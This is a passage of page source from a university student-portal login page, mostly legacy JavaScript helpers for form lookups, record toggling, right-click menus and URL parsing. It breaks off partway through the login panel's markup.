// Script: Force text within the field to Uppercase
// Run as: <input .... onChange="forceUpper(this);" ...>
  function forceUpper(ctl)
  {
  ctl.value = ctl.value.toUpperCase();
  }

// #######
// Script: Check if entered value is a number
  function isnumber(ctl)
  {
    if (parseFloat(ctl) != ctl)
    {
      return false;
    }
    else
    {
      return true;
    }
  }

function run_lov_secure(formName,codeName,descName,code,descr,fromClause,whereClause,lov_title,code_title,descr_title,showCode,theFilter,chkSum,returnRow) {
// T148854 Add returnRow parameter to function run_lov_secure and remove run_lov_multi from script file.
 var the_pathname = location.pathname;
 var i = the_pathname.indexOf ("/:");
 var j = the_pathname.indexOf ("/", ++i);

 if (i != -1) { // Syntactically incorrect url so it needs to be corrected
  the_pathname = the_pathname.substring (j, the_pathname.length);
 }; // (i != -1)
 if (returnRow == undefined) { returnRow = "-1"; }

 frmLOV = open("web.w01pkg.w01_lov_proc_sec" +
  "?X_FILTER=" + escape(theFilter) +
  "&X_CODE=" + escape(code) +
  "&X_DESCR=" + escape(descr) +
  "&X_FROM="+ escape(fromClause) +
  "&X_WHERE="+ escape(whereClause) +
  "&X_CALLER_URL=" + escape(location.protocol + "//" +
                            location.host + location.pathname +
                            location.search)+
  "&X_LOV_TITLE=" + escape(lov_title) +
  "&X_CODE_TITLE=" + escape(code_title) +
  "&X_DESCR_TITLE=" + escape(descr_title) +
  "&X_SHOW_CODE=" + escape(showCode) +
  "&X_FORM_ITEM_NAME=" + escape(formName) +
  "&X_CODE_ITEM_NAME=" + escape(codeName) +
  "&X_DESC_ITEM_NAME=" + escape(descName) +
  "&X_SEARCH_BY_CODE=" + escape(showCode) +   
  "&X_CHK=" + escape(chkSum) +
  "&X_RETURN_ROW="+ escape(returnRow),
  "winLOV", "scrollbars=yes,resizable=yes,width=450,height=400");
  window.frmLOV.focus();

 if (frmLOV.opener == null) { frmLOV.opener = self; }
} // end of function run_lov_secure

// #######
// Script: 
//-->


<!--

//Disable right mouse click Script
//By Maximus (maximus@nsimail.com) w/ mods by DynamicDrive
//For full source code, visit http://www.dynamicdrive.com

var message="Function Disabled!";

///////////////////////////////////
function clickIE4(){
  if (event.button==2){
    alert(message);
    return false;
  } else {
    return true;
  }
}

///////////////////////////////////
// function JSSumdet_Showme toggles the data between Summary and Detail layout
function JSSumdet_Showme(ctl)
{
  if (document.getElementById) // Internet Explorer
  {
    if (document.getElementById("xd"+ctl).style.display=="none")
    {
      document.getElementById("xd"+ctl).style.display="block";
      if (document.getElementById("xs"+ctl))
        document.getElementById("xs"+ctl).style.display="none";
    }
    else
    {
      document.getElementById("xd"+ctl).style.display="none";
      document.getElementById("xs"+ctl).style.display="block";
    }
  }
  else
  {
    document.all.xs1.style.display="block";
    document.all.xd1.style.display="block";
  }
}

///////////////////////////////////
// function JSMark_This gives user option to open or close all records with one click
   var x_sumrecs = 0;
   function JSMark_This(fldInd) {
   var i=1;
   while (i<=c_sumrecs)
     {
     if (fldInd.value=="Open All Records")
        {
        document.getElementById("xd"+i).style.display="block";
        document.getElementById("xs"+i).style.display="none";
        }
     else
        {
        document.getElementById("xd"+i).style.display="none";
        document.getElementById("xs"+i).style.display="block";
        }
   
     i++;
     }
   
   if (fldInd.value=="Open All Records")
      {
      fldInd.value="Close All Records";
      }
   else
      {
      fldInd.value="Open All Records";
      }
   }

///////////////////////////////////
// function JSMark_All Opens all records 
   function JSMark_All() {
   var i=1;
   while (i<=c_sumrecs)
   {
     document.getElementById("xd"+i).style.display="block";
     document.getElementById("xs"+i).style.display="none";
     i++;
   }
   
   }

<!--
////////////////////////////////////////////////////////////////////////////////////////////
//// This function will call any process on the server without actually refreshing the page
//// Please Note that this only works in IE5.5+ and Netscape6+
//// DBProcedure  - Mandatory, This is the Procedure to be called. Must return JavaScript.
////              -            This procedure must ALWAYS contain parameter for x_stmp.
////              -            This timestamp will contain a new value every time the procedure is 
////              -            called and ensures that no caching could be done.
//// DBParameters - Optional , Please start with & as first Parameter will be x_stmp
//// DBTagName    - Optional , Use different values if this function call should not overwrite data
////              -            from another call to the same function. 
////              -            By default this should be left out
////////////////////////////////////////////////////////////////////////////////////////////
function callDynBGproc(DBProcedure,DBParameters,DBTagName) {
	var dynamicScriptAreaTagName="dynScriptArea";
	var d = new Date();   // use the Date field to create a datestamp (to enforce unique URL)
    var v_param = DBParameters;
      if (v_param == undefined)
         {
         v_param  = "&";
         }
      /* 261987 */

    var v_new_param = v_param.replace(/&/gi, "*").replace(/\+/g, "~");

	// Use the given tag name iso the default (if available)
	if (DBTagName && DBTagName != "")
		dynamicScriptAreaTagName=DBTagName;

	// first Ensure that this node does Not Exist. If it does, remove it.
	window.status='Clearing Previous Values';
	xx = document.getElementById(dynamicScriptAreaTagName);
	if (xx != null) {
		xx.parentNode.removeChild(document.getElementById(dynamicScriptAreaTagName));
	}

	// Now create a new SCRIPT Node and point the source to a procedure in the DB
	window.status='Working';
	xscript=document.createElement('script');
	xscript.setAttribute('language','Javascript');
	xscript.setAttribute('type','text/javascript');
	xscript.setAttribute('id',dynamicScriptAreaTagName);
	//alert(DBProcedure+'?x_stmp='+escape(d.getTime())+DBParameters);
	//alert(DBProcedure+'?x_stmp='+escape(d.getTime())+v_new_param);
//	xscript.setAttribute('src',DBProcedure+'?x_stmp='+escape(d.getTime())+DBParameters);
	xscript.setAttribute('src','web.w01pkg.w01_setHeader?x_stmp='+escape(d.getTime())+'&x_call='+DBProcedure+'&x_parms='+escape(v_new_param));
	document.getElementsByTagName('head').item(0).appendChild(xscript);

    
	window.status='Done';
	return true
}

// -->
// Setup the reportback to *frm of any errors found in the *proc procedures
function errReportBack(err_source,err_string) {
var ErrorScriptAreaTagName="ErrScriptArea";
var err_text="";
if (err_source.length != 0)
   {
   err_text=err_text+err_source;
   }
if (err_string.length != 0)
   {
   err_text=err_text+
            'parent.F3.document.getElementById("ErrorDiv").innerHTML="'+err_string+'<br />&nbsp;"; '+
            'parent.F3.document.getElementById("ErrorDiv").style.display="block"; ';
   }

// Now add logic to ensure error only get reported once and is then removed
err_text=err_text+
         'xx = parent.F1.document.getElementById("'+ErrorScriptAreaTagName+'"); '+
	 'xx.parentNode.removeChild(xx);';


// first Ensure that this node does Not Exist.
xx = parent.F1.document.getElementById(ErrorScriptAreaTagName);
if (xx != null) {
	xx.parentNode.removeChild(parent.F1.document.getElementById(ErrorScriptAreaTagName));
}

// Now create a new ERROR SCRIPT Node and Populate with specified Detail
xscript=parent.F1.document.createElement('script');
xscript.setAttribute('language','Javascript');
xscript.setAttribute('type','text/javascript');
xscript.setAttribute('id',ErrorScriptAreaTagName);
//alert(err_text);
// Use the following line to populate for Internet Explorer
xscript.setAttribute('text','function chk_for_errors() {'+err_text+'}');
parent.F1.document.getElementsByTagName('head').item(0).appendChild(xscript);
// Use the following line to populate the DOM (Throw away errors generated by Internet Explorer)
try{parent.F1.document.getElementById(ErrorScriptAreaTagName).innerHTML='function chk_for_errors() {'+err_text+'}';}catch(e){void(0)}
//alert(parent.F1.document.getElementById(ErrorScriptAreaTagName).innerHTML);
window.status='Done';
}


<!--

/*
//Disable right mouse click Script
//By Maximus (maximus@nsimail.com) w/ mods by DynamicDrive
//For full source code, visit http://www.dynamicdrive.com
*/

var message="Function Disabled!";

///////////////////////////////////
/*
function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}

function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}

if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}

document.oncontextmenu=new Function("alert(message);return false")
*/
// --> 

//////////////////////////////
function textLimit(field, maxlen) 
{
  if (field.value.length > maxlen + 1)
  alert('Your input has been truncated! Only '+maxlen+' characters are allowed.');
  if (field.value.length > maxlen)
    field.value = field.value.substring(0, maxlen);
}

//////////////////////////////
function imposeMaxLength(Object, MaxLen)
{
  if (eval(Object.value.length) >= eval(MaxLen))
  {
    Object.value = Object.value.substring(0, MaxLen - 1);
  }
}


//////////////////////////////////////////////////////////////////////////
// Mark all table Rows for use with generic Right-click logic
//////////////////////////////////////////////////////////////////////////
var ITS_Offset = 0; // Set offset level to PAGE. Anything above zero will define row level
function setITSOffsetDefinition(){
var v_tr = document.getElementsByTagName("tr");
var v_offset_cntr = 0;
for (var i = 0; i < v_tr.length ; i++)
{
// var v_class = v_tr[i].getAttribute("class"); // This does not seem to work in IE...Try the following:
var v_class = "UNKNOWN";
var v_attr =v_tr[i].attributes;
for (var j = 0; j < v_attr.length ; j++) {
     //alert (v_attr[j].name + "=" + v_attr[j].value);
     if (v_attr[j].name == "class") v_class = v_attr[j].value;
    }
   // alert(v_class);
   if (v_class == "rldata" || v_class == "mrdatadisp" || v_class == "rowover")
      { v_tr[i].setAttribute("its_offset",++v_offset_cntr) } else
      { v_tr[i].setAttribute("its_offset","0") }
   //alert("Class of element " + i + " is : " + v_tr[i].getAttribute("class") + "\n");
}

//
// Testing to see if Attribute is set.
//
//var v_tr = document.getElementsByTagName("tr");
//for (var i = 0; i < v_tr.length ; i++)
//{
//   alert("Class of Row " + v_tr[i].getAttribute("its_offset") + " is : " + v_tr[i].getAttribute("class") + "\n");
//}
}




//////////////////////////////////////////////////////////////////////////////
// Use this function to load an extra javascript file                       //
// x_jsFile = The relative file name that must be uploaded/included         //
//////////////////////////////////////////////////////////////////////////////
function itsUploadJSfile(x_jsFile) {
var html_doc = document.getElementsByTagName('head').item(0);
var vjs = document.createElement('script');
vjs.setAttribute('language', 'javascript');
vjs.setAttribute('type', 'text/javascript');
vjs.setAttribute('src', x_jsFile);
html_doc.appendChild(vjs);
return false;
}

//////////////////////////////////////////////////////////////////////////////
// Use this function to load an extra Stylesheet files                      //
// x_cssFile = The relative file name that must be uploaded/included        //
//////////////////////////////////////////////////////////////////////////////
function itsUploadCSSfile(x_cssFile) {
var html_doc = document.getElementsByTagName('head').item(0);
var vcss = document.createElement('link');
vcss.setAttribute('rel', 'stylesheet');
vcss.setAttribute('type', 'text/css');
vcss.setAttribute('href', x_cssFile);
html_doc.appendChild(vcss);
return false;
}

function viewSource() {
alert('You Pressed View Source');
}
/*
isMozilla = (document.all) ? 0 : 1;
if (isMozilla)
{
d_loc="view-source:" + document.location.href;
d=window.open(d_loc);
}
else
{
d=window.open();
d.document.open('text/plain').write(document.documentElement.outerHTML);
}
}
*/
//////////////////////////////////////////////////////////////////////////////
// Use this function to get a specified value from the html page.           //
// It works either per FORM or per TABLE Column number                      //
// if x_formsOrTD = 'F' then x_ind1=>The Form name,                         //
//                           x_ind2=>The Field Name                         //
//                           x_offset=>The offset within the form           //
//                                     Normally this is row-1 (forms base-0)//
//                                     In Multi-row forms: row-3 (2-Dummies)//
//                                     For non-repeat fields: 0 (i.e year)  //
// if x_formsOrTD = 'T' then x_ind1=>The n'th <td> column (-1 because base0)//
//                           x_ind2=>The n'th textnode within above <td>    //
//                           x_offset=>The specified Row (nothing strange)  //
// if x_formsOrTD = 'P' then x_ind1=> is a parameter name the return value  //
//                                    is the value of the parameter         //
//////////////////////////////////////////////////////////////////////////////
function getRCvalue(x_formsOrTD, x_ind1, x_ind2, x_offset) 
{
 // document.write('FormsorTD:'+x_formsOrTD+' 1:'+x_ind1+' 2:'+x_ind2+' Offset'+ x_offset);
if (x_formsOrTD == 'T') 
   { //x_ind1=>The n'th column/TD, x_ind2=>The n'th textnode
    if (ITS_Offset == "0") {return "";} // Right Click wasnt done inside a legal area
      var v_tr = document.getElementsByTagName("tr");
      for (var i = 0; i < v_tr.length ; i++)
      {
      if (v_tr[i].getAttribute("its_offset") == ITS_Offset) // Get to the right row
         {
         var v_td = v_tr[i].getElementsByTagName("td");
         if (v_td[x_ind1 -1].childNodes[x_ind2].nodeType == "3") // If this is a textNode: return it
            return v_td[x_ind1 -1].childNodes[x_ind2].nodeValue;
         else // else: Assume it is an element (like a tag "<a href...></a>" and return its first child node
            return v_td[x_ind1 -1].childNodes[x_ind2].childNodes[0].nodeValue;
         }
      }
   }// if (x_formsOrTD == 'T')
else 
   {
   if (x_formsOrTD == 'P') 
      { //Get value from URL x_ind2 = parameter
      var UrlPars = new Array()
      UrlPars = location.search.split("?")[1].split("&")
      // document.write(UrlPars[1])
      for (x in UrlPars)
         { ParVal=UrlPars[x]
         var ValPair=ParVal.split('=')
         if (ValPair[0]==x_ind2)
            {
            return ValPair[1]
            }
         }
      return " ";
      }
   else
      {    // if (x_formsOrTD == 'F')
      if (x_formsOrTD == 'F') {
      if (x_offset == '') // Sometimes no offset is needed
         { 
         // Checkbox Works Different. is IT
         if (eval('document.'+x_ind1+'.'+x_ind2+'.type') == "checkbox")
            {
            if (eval('document.'+x_ind1+'.'+x_ind2+'.checked'))
               { return eval('document.'+x_ind1+'.'+x_ind2+'.value'); }
            else
               { return ""; }
         }

         // Radio Buttons are even Worse !@#$%^!@#$%^
         if (eval('document.'+x_ind1+'.'+x_ind2+'.type') == "undefined") 
            {
            if (eval('document.'+x_ind1+'.'+x_ind2+'[0].type') == "radio")
               {
               v_workingFld = eval('document.'+x_ind1+'.'+x_ind2);
               for (ci=0; ci<v_workingFld.length; ci++) 
                  { if (v_workingFld[ci].checked) 
                        { return v_workingFld[ci].value;}
                  }
               return "";
               }
            }
            return eval('document.'+x_ind1+'.'+x_ind2+'.value;');
         }
      else
         { 
         // Checkbox Works Different !@#$%^
         if (eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+'].type') == "checkbox")
            {
            if (eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+'].checked'))
               { return eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+'].value'); } 
            else 
               { return ""; }
            }
         // Radio Buttons are even Worse !@#$%^!@#$%^
         if (eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+'].type') == "undefined")
            {
            if (eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+'][0].type') == "radio")
               {
               v_workingFld = eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+']');
               for (ci=0; ci<v_workingFld.length; ci++) 
                     { if (v_workingFld[ci].checked) { return v_workingFld[ci].value;}}
               return "";
               }
            }
         // TODO: Add code to get selectedindex....value detail
         return eval('document.'+x_ind1+'.'+x_ind2+'['+x_offset+'].value;');
         }
      }
   else
      {
      return "";
      }
   }
}
}
///////////////////////////////////////////////////////////////////////////
// Use AJAX to request the Right-Click-Menu items and instructions.      //
// NOTE: The "Request" only forwards the query.                          //
//     : Look in the "Response" part for the actual code                 //
///////////////////////////////////////////////////////////////////////////
function  ItsRCMenu_AjaxRequest() {
  // Get the Procedure name
  var v_urlArr = location.href.toLowerCase().split("?"); // First remove any input parameters
      v_urlArr = v_urlArr[0].split(".");                 // split on the dots
  var v_urlLength = v_urlArr.length;
  var v_urlProcedure = v_urlArr[v_urlLength-1];          // Take the stuff behind the last dot
  // Get the Package name
  v_urlArr = v_urlArr[v_urlLength-2].split("/");
  v_urlLength = v_urlArr.length;
  var v_urlPackage = v_urlArr[v_urlLength-1];           // Take the stuff before the last dot
  // Get the DAD
 //alert(location.href.toLowerCase().split("/pls/")[1].split("/")[0]);
 var v_dad = '';
 if (location.href.toLowerCase().split("/pls/").length > 1)
     { v_dad = '/pls/'+location.href.toLowerCase().split("/pls/")[1].split("/")[0]; }
 else
     { v_dad = '/'    +location.href.toLowerCase().split(":")[2].split("/")[1]; }
 
  // Setup the AJAX request
  var v_url  = v_dad+'/wr02pkg.wr02_getRCmenu';
      v_url += '?x_pkg='+encodeURIComponent(v_urlPackage)+'&x_proc='+encodeURIComponent(v_urlProcedure)+'&x_offset='+encodeURIComponent(ITS_Offset);   
      // v_url = v_dad+'/wr02pkg.wr02_getRCmenu?x_pkg=w99pkg&x_proc=mi_main_menu&x_offset=0';
      // TODO: Maybe add a timestamp to the above v_url
  // Do the AJAX Call
  var xmlHttp=GetXmlHttpObject();
  SetXmlHttphandler(function() { ItsRCMenu_AjaxResponse(xmlHttp); },xmlHttp);
  xmlHttp.open("GET", v_url , false);
  xmlHttp.send();
}
//////////////////////////////////////////////////////////////////////////////
// Use AJAX response to format the Right-Click-Menu items and instructions. //
// Note: Parameters for addMenuItem is as follows:                          //
//       1) Description/name of menu entry to be displayed                  //
//       2) Name of the Submenu linked to this option                       //
//       3) Instruction to be performed when user chooses this option       //
//   NOTE: An entry can either be a submenu link or an instruction not both //
//////////////////////////////////////////////////////////////////////////////
function ItsRCMenu_AjaxResponse(xmlHttp) 
{ 
  if (xmlHttp != null && (xmlHttp.readyState==4 || xmlHttp.readyState=="complete"))
  {
    var v_response = xmlHttp.responseXML.documentElement;
    if (v_response != null) {
    if (v_response.getElementsByTagName('MENU_ROW')[0] == null)
    {
      var error_message="";
      if (v_response.getElementsByTagName('error_description')[0] == null) 
         { error_message=""; }
      else          
         { error_message = v_response.getElementsByTagName('error_description')[0].firstChild.data; }
      var java_error_message="";
      if (v_response.getElementsByTagName('java_error_description')[0] != null)
       {
       java_error_message = v_response.getElementsByTagName('java_error_description')[0].firstChild.data;
       }
      itsRCmenu = new jsDOMenu(500); // The parameter (500) is the display width of the popup
      itsRCmenu.addMenuItem(new menuItem(error_message,"",""));
      if (java_error_message != "") itsRCmenu.addMenuItem(new menuItem(java_error_message,"",""));
      itsRCmenu.addMenuItem(new menuItem("-",""," "));
      itsRCmenu.addMenuItem(new menuItem("Response Status Code="+xmlHttp.status, "", ""));
      itsRCmenu.addMenuItem(new menuItem("Response Status Text="+xmlHttp.statusText, "", ""));
      itsRCmenu.addMenuItem(new menuItem("Response Full Text="+xmlHttp.responseText, "", ""));
      itsRCmenu.addMenuItem(new menuItem("-",""," "));
      itsRCmenu.addMenuItem(new menuItem("View Source", "", "javascript:viewSource();"));
    }
    else
    {
    var v_menuRows = v_response.getElementsByTagName('MENU_ROW');
    // First build the individual menu structures
    for (v_c01 = 0; v_c01 < v_menuRows.length; v_c01++) 
        {
        var v_str  = '';
            v_str += v_menuRows[v_c01].getElementsByTagName('name')[0].firstChild.data;
            v_str += ' = new jsDOMenu(';
            v_str += v_menuRows[v_c01].getElementsByTagName('length')[0].firstChild.data;
            v_str += ');';
            eval(v_str);
            
        // Add the individual items in this menu
        var v_menuItems = v_menuRows[v_c01].getElementsByTagName('MENU_ITEMS');
        for (v_c02 = 0; v_c02 < v_menuItems.length; v_c02++)
            {
            // alert(v_menuItems[v_c02].getElementsByTagName('description')[0].firstChild.data);
            var v_str  = '';
            v_str += v_menuRows[v_c01].getElementsByTagName('name')[0].firstChild.data;
            v_str += '.addMenuItem(new menuItem("';
            v_str += v_menuItems[v_c02].getElementsByTagName('description')[0].firstChild.data;
            v_str += '","';
            if (v_menuItems[v_c02].getElementsByTagName('submenu')[0].firstChild != null)
            v_str += v_menuItems[v_c02].getElementsByTagName('submenu')[0].firstChild.data;
            v_str += '","'
            if (v_menuItems[v_c02].getElementsByTagName('instruction')[0].firstChild != null)
            v_str += v_menuItems[v_c02].getElementsByTagName('instruction')[0].firstChild.data;
            v_str += '"));';
            eval(v_str);
            }
        }
    // Now hook the submenus onto their their masters
    for (v_c01 = 0; v_c01 < v_menuRows.length; v_c01++) 
        {
        var v_menuItems = v_menuRows[v_c01].getElementsByTagName('MENU_ITEMS');
        for (v_c02 = 0; v_c02 < v_menuItems.length; v_c02++)
            {
            if (v_menuItems[v_c02].getElementsByTagName('submenu')[0].firstChild != null &&
                v_menuItems[v_c02].getElementsByTagName('submenu')[0].firstChild.data != '')
               {
               var v_str  = '';
               v_str += v_menuRows[v_c01].getElementsByTagName('name')[0].firstChild.data;
               v_str += '.items.';
               v_str += v_menuItems[v_c02].getElementsByTagName('submenu')[0].firstChild.data;
               v_str += '.setSubMenu('
               v_str += v_menuItems[v_c02].getElementsByTagName('submenu')[0].firstChild.data;
               v_str += 'menu);';
               eval(v_str);
               }
            }
        }
    eval('setPopUpMenu('+v_menuRows[0].getElementsByTagName('name')[0].firstChild.data+');');
    }
  } 
  }

} 

////////////////////////////////////////////////////////////////////////////////
// This function will be started for every page that includes its_scripts.js
////////////////////////////////////////////////////////////////////////////////
function ITSinit(){
  if (document.createElement && document.getElementById) {
    createjsDOMenu();
  }
}
////////////////////////////////////////////////////////////////////////////////
// Upload the following .js files
////////////////////////////////////////////////////////////////////////////////
//147569 start
//itsUploadCSSfile('/itsincludes/css/jsdomenu.css');
//itsUploadJSfile('/itsincludes/js/its_general.js');
//itsUploadJSfile('/itsincludes/js/jsdomenu.js');

//window.onload=ITSinit; // TODO: What happens if window already has an "onload" event?
//147569  end

//
function run_lov_bind(formName,itemName,itemDesc,theFilter,
                      lovCode,lovParms,showCode,chkSum,codeHeading,
                      descHeading,returnRow)
 {
  if (returnRow == undefined) 
     { 
      returnRow = "-1"; 
     }
  if (codeHeading == undefined)
     {
      codeHeading = "Code";
     }
  if (descHeading == undefined)
     {
      descHeading = "Description";
     }
  frmLOV = open("web.w01pkg.w01_lov_bind" +
                "?X_THEFILTER="  + escape(theFilter) +
                "&X_FORM_NAME="  + escape(formName) +
                "&X_ITEM_NAME="  + escape(itemName) +
                "&X_ITEM_DESC="  + escape(itemDesc) +
                "&X_LOVCODE="    + escape(lovCode) +
                "&X_LOVPARMS="   + escape(lovParms) +
                "&X_SHOWCODE="   + escape(showCode) +
                "&X_CHKSUM="     + escape(chkSum) +
                "&X_CODE_HEADING=" + escape(codeHeading)+
                "&X_DESC_HEADING=" + escape(descHeading)+
                "&X_RETURN_ROW=" + escape(returnRow)+
                "&X_CALLER_URL=" + escape(location.protocol + "//" +
                                          location.host + location.pathname +
                                          location.search),
                "winLOV", 
                "scrollbars=yes,resizable=yes,width=450,height=400");
  window.frmLOV.focus();
  if (frmLOV.opener == null) 
     { 
      frmLOV.opener = self; 
     }
}
function run_lov_bind_jsp(formName,itemName,itemDesc,theFilter,
                          lovCode,lovParms,showCode,chkSum,theDad,codeHeading,
                          descHeading,returnRow)
 {
  if (returnRow == undefined) 
     { 
      returnRow = "-1"; 
     }
  if (codeHeading == undefined)
     {
      codeHeading = "Code";
     }
  if (descHeading == undefined)
     {
      descHeading = "Description";
     }
  frmLOV = open("/pls/"+theDad+"/web.w01pkg.w01_lov_bind" +
                "?X_THEFILTER="  + escape(theFilter) +
                "&X_FORM_NAME="  + escape(formName) +
                "&X_ITEM_NAME="  + escape(itemName) +
                "&X_ITEM_DESC="  + escape(itemDesc) +
                "&X_LOVCODE="    + escape(lovCode) +
                "&X_LOVPARMS="   + escape(lovParms) +
                "&X_SHOWCODE="   + escape(showCode) +
                "&X_CHKSUM="     + escape(chkSum) +
                "&X_CODE_HEADING=" + escape(codeHeading)+
                "&X_DESC_HEADING=" + escape(descHeading)+
                "&X_RETURN_ROW=" + escape(returnRow)+
                "&X_CALLER_URL=" + escape(location.protocol + "//" +
                                          location.host + location.pathname +
                                          location.search),
                "winLOV", 
                "scrollbars=yes,resizable=yes,width=450,height=400");
  window.frmLOV.focus();
  if (frmLOV.opener == null) 
     { 
      frmLOV.opener = self; 
     }
}

//225095
//Get style property [styleProp] from component [el]
function getStyle(el,styleProp) {
	var x = document.getElementById(el);
	if (x.currentStyle)
    //For IE
		var y = x.currentStyle[styleProp];
	else if (window.getComputedStyle)
    //Firefox etc
		var y = document.defaultView.getComputedStyle(x,null).getPropertyValue(styleProp);
	return y;
}

//Get URL parameters
function getAllUrlParams(url) {

  // get query string from url (optional) or window
  var queryString = url ? url.split('?')[1] : window.location.search.slice(1);

  // we'll store the parameters here
  var obj = {};

  // if query string exists
  if (queryString) {

    // stuff after # is not part of query string, so get rid of it
    queryString = queryString.split('#')[0];

    // split our query string into its component parts
    var arr = queryString.split('&');

    for (var i=0; i<arr.length; i++) {
      // separate the keys and the values
      var a = arr[i].split('=');

      // in case params look like: list[]=thing1&list[]=thing2
      var paramNum = undefined;
      var paramName = a[0].replace(/\[\d*\]/, function(v) {
        paramNum = v.slice(1,-1);
        return '';
      });

      // set parameter value (use 'true' if empty)
      var paramValue = typeof(a[1])==='undefined' ? true : a[1];

      // (optional) keep case consistent
      paramName = paramName.toLowerCase();
      paramValue = paramValue.toLowerCase();

      // if parameter name already exists
      if (obj[paramName]) {
        // convert value to array (if still string)
        if (typeof obj[paramName] === 'string') {
          obj[paramName] = [obj[paramName]];
        }
        // if no array index number specified...
        if (typeof paramNum === 'undefined') {
          // put the value on the end of the array
          obj[paramName].push(paramValue);
        }
        // if array index number specified...
        else {
          // put the value at that index number
          obj[paramName][paramNum] = paramValue;
        }
      }
      // if param name doesn't exist yet, set it
      else {
        obj[paramName] = paramValue;
      }
    }
  }

  return obj;
}

//225095
function w3_open() {
  parent.document.getElementById("mySidebar").style.display = "block";
  parent.document.getElementById("myOverlay").style.display = "block";
}
function w3_close() {
  parent.document.getElementById("mySidebar").style.display = "none";
  parent.document.getElementById("myOverlay").style.display = "none";
}
</script>
<body class="w3-margin-left">
<div class="fra_header w3-theme-l4" id="fra_header"><div class="fra_inst">UNIVERSITY OF LIMPOPO</div><div class="fra_date w3-hide-small"><script type="text/javascript">prt_header_datestamp();</script></div></div><div class="w3-row w3-hide-small"><div class="w3-half itslogimg"><img alt="UNIVERSITY OF LIMPOPO" src="https://ulc-prod-webserver.ul.ac.za/itsimages/InsImg.gif"/></div><div class="w3-half" id="adaptit" style="text-align: right;"><img alt="ITS Tertiary Software" src="https://ulc-prod-webserver.ul.ac.za/itsimages/ItsImg.gif"/></div></div>
<div class="login_top" id="login_top"><script type="text/javascript">/* ************************************************************************
  Program : login_top.js
  Changed : 09-Nov-2017 DG 225095 Style adjustments
          : 10-NOV-2017 DG 225957 iEnabler look and feel enhancements
  X0_VERSION : v04.1.0.0
  Add any HTML for top DIV of page
************************************************************************ */
document.write('<p/>');
</script></div>
<div class="login w3-row">
<script type="text/javascript">// Changed: 17-Jan-2006 T124360 
//        : 08-Mar-2007 Els t140480 copied from v13
//        : 24-Oct-2007 DG F145858 Add new message for closed application cycles
//        : 26-Oct-2007 DG F115522 Implement links to new modules
//        : 31-Oct-2008 DG F154159 Spelling errors
//        : 04-Jun-2009 DG T157045 Alumni Login changes
//        : 06-Aug-2013 ChristoV T187909 Modify Call to New Interest to Study Here Application
//        : 09-Nov-2017 DG 225095 Style adjustments
//        : 10-NOV-2017 DG 225957 iEnabler look and feel enhancements
//        : 20-Aug-2018 Adele 230500 Comment out the interested in studying here - this does not work and is not used
// Version: v04.1.0.1
document.write('<div id="login_left" class="w3-half w3-container">'+
'<div class="w3-card-4" style="text-align:center; max-width:500px; padding-bottom:14px;">'+
' <header class="w3-container w3-blue">'+
'  <h5>Prospective Students</h5>'+
' </header>'+
' <p>If you are a prospective student, not registered at this institution, please select the following option:</p>'+
//' <a href="ws22pkg.w22_startup" onMouseOver="javascript:window.status=\'Interested in studying here\';return true;" onMouseOut="javascript:window.status=\' \';">'+
//'  <img class="w3-image w3-hover-grayscale w3-margin-left w3-margin-right" style="width:10%; height:10%" src="/itsimages/college-icon.png" class="w3-border w3-padding" alt="Interested in studying here"></a>'+
//' <label>View a list of study areas and qualifications offered at this institution.</label>'+
' <br />'+
' <a href="gen.gw1pkg.gw1startup?x_processcode=ITS_OAP" onMouseOver="javascript:window.status=\'New Application\';return true;" onMouseOut="javascript:window.status=\' \';"><img class="w3-image w3-hover-grayscale"  style="width:10%; height:10%" src="/itsimages/student-icon.png" class="w3-border w3-padding" alt="Interested in studying here"></a>'+
' <label>Apply</label>'+
'</div>'+
'</div>');

</script>
<script type="text/javascript">/* ************************************************************************
  Program : login_right.js
  Changed : 31-Jul-2008 T151378 Dinong Allow other users to login
          : 17-Nov-2008 DG T154508 Fix spelling mistakes
          : 02-MAR-2011 DG T164475 ATOV - Add alumni login
          : 19-Aug-2013 DG 193114 ATOV for 192099 Change login image button to HTML form submit button
          : 09-Nov-2017 DG 225095 Style adjustments
          : 10-NOV-2017 DG 225957 iEnabler look and feel enhancements
          : 19-Aug-2018 Adele 230500 Forgot Student Number button - add class to all buttons
  X0_VERSION : v04.1.0.1
************************************************************************ */
var S_check=' ';
var P_check=' ';
var O_check=' ';
var A_check=' ';
var Usr_txt='User Number';
var loginLeft;

function chkZero(ctl) {
  if (ctl.value.substr(0,1) == "0") {
    alert("Please do not start the PIN with a 0.");
    ctl.focus();
    ctl.select();
    return false;
  }
  return true;
}

function set_it() {
  Usr_txt='Student Number'; 
  for (i=0; i<document.frmLogin.numtype.length; i++) {
    if (document.frmLogin.numtype[i].checked) {
      if (document.frmLogin.numtype[i].value == 'P') { Usr_txt='Personnel Number: '; } else
      if (document.frmLogin.numtype[i].value == 'O') { Usr_txt='External Number: ';  } else
      if (document.frmLogin.numtype[i].value == 'A') { Usr_txt='Alumni Number: ';    }   else
                                                     { Usr_txt='Student Number: ';   }
    }
    document.getElementById("LogUsr").childNodes[0].nodeValue = Usr_txt;
    document.frmLogin.unum.focus();
  }
}

var numtype = 'S';
if (!getAllUrlParams().numtype) numtype ='S'; else numtype=getAllUrlParams().numtype.toUpperCase();
//document.write('numtype='+numtype);

if (numtype == 'P') { P_check=' checked'; Usr_txt='Personnel Number: '; } else
if (numtype == 'O') { O_check=' checked'; Usr_txt='External Number: ';  } else
if (numtype == 'A') { A_check=' checked'; Usr_txt='Alumni Number: ';    } else
                    { S_check=' checked'; Usr_txt='Student Number: ';   }

loginLeft = getStyle('login_left','display');
//document.write('loginLeft='+loginLeft);

if (loginLeft=="none") {
  document.write('<div id="login_right" class="w3-rest w3-padding-16">');
} else {
  document.write('<div id="login_right" class="w3-half">');
}

document.write(' <div class="w3-card-4 w3-margin-bottom" style="max-width:500px;">'+
'  <header class="w3-container w3-blue">'+
'   <h5>Registered Users: Login Credentials</h5>'+
'  </header>'+
